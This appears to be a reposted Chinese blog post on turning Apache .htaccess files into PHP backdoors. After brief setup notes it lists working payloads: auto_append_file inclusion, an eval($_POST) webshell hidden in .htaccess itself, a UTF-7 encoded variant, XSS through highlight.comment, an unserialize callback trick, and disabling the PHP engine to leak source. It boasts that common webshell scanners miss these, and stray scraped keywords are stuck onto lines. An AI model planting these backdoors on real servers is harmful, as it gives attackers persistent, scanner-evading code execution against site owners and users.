利用.Htaccess文件構成的PHP後門

from:http://www.tiejiang.org/10048.htmlphp

0x00 .Htaccess簡介

.htaccess 是Apache HTTP Server的文件目錄系統級別的配置文件的默認的名字。它提供了在主配置文件中定義用戶自定義指令的支持。 這些配置指令須要在 .htaccess 上下文 和用戶須要的適當許可。html

平時開發用的最多的就是URL重定向功能。mysql

0x01 開啓.htaccess

Apache中修改配置文件httpd.confweb

修改以下內容

Options FollowSymLinkssql

AllowOverride Noneshell

爲:app

Options FollowSymLinksxss

AllowOverride Allide

開啓rewrite模塊

LoadModule rewrite_module modules/mod_rewrite.so函數

後門篇

文件包含

.htaccess:

php_value auto_append_file D:/wamp/www/1.txt

*.php

XSS後門

.htaccess:

php_value highlight.comment '"><script>alert(1);</script>'

*.php

PHP後門

.htaccess:

php_value auto_append_file .htaccess
#<?php eval($_POST[1]);

*.php
.htaccess:

php_flag zend.multibyte 1
php_value zend.script_encoding "UTF-7"
php_value auto_append_file .htaccess
#+ADw-script+AD4-alert(1)+ADsAPA-/script+AD4 #+ADw?php phpinfo()+Ads

*.php
.htaccess:

php_value unserialize_callback_func "phpinfo"
index.php:
unserialize('O:1:"1":0:{}');

相似的回調函數都是能夠的,過此處phpinfo要怎麼調用才能運行任意代碼還沒研究出來。

任意文件下載

.htaccess:

php_flag engine 0

*.php

0x03 webshell查殺

目前使用了D盾webshell查殺、SeayFindShell等工具對這個都沒有查殺效果。不過也都是一些簡單的一句話木馬了,很容易被入庫幹掉。本身寫了一個假裝成mysql調試文件的PHP木馬,感受好用多了。

相關文章
相關標籤/搜索